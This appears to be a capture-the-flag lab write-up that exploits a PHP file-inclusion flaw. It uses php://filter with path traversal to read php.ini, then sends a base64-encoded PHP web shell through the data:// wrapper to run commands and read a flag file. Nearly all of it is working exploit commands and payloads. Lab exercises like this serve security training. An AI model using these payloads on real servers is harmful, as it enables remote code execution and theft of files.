PHP Wrappers
Try to gain RCE using one of the PHP wrappers and read the flag at /
Step 1 - Check if allow_url_include is on:
Capture the php.ini file:
curl "http://SERVER_IP:SERVER_PORT/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
Copy the base64 string (W1BIUF0KCjs7Ozs7Ozs7O ...SNIP ... 4dGVuc2lvbj1leHBlY3QK) to a file
Look for the allow_url_file with the command
cat curl.txt | base64 -d | grep allow_url_include
Step 2 - Remote Code Execution:
Base64 encode a PHP web shell:
echo '<?php system($_GET["cmd"]); ?>' | base64 PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
Test the web shell:
curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
Look for the flag on the / directory:
curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls%20../../../../'
Retrieve the flag:
curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20../../../37809e2f8952f06139011994726d9ef1.txt'
And we got the flag!
Last updated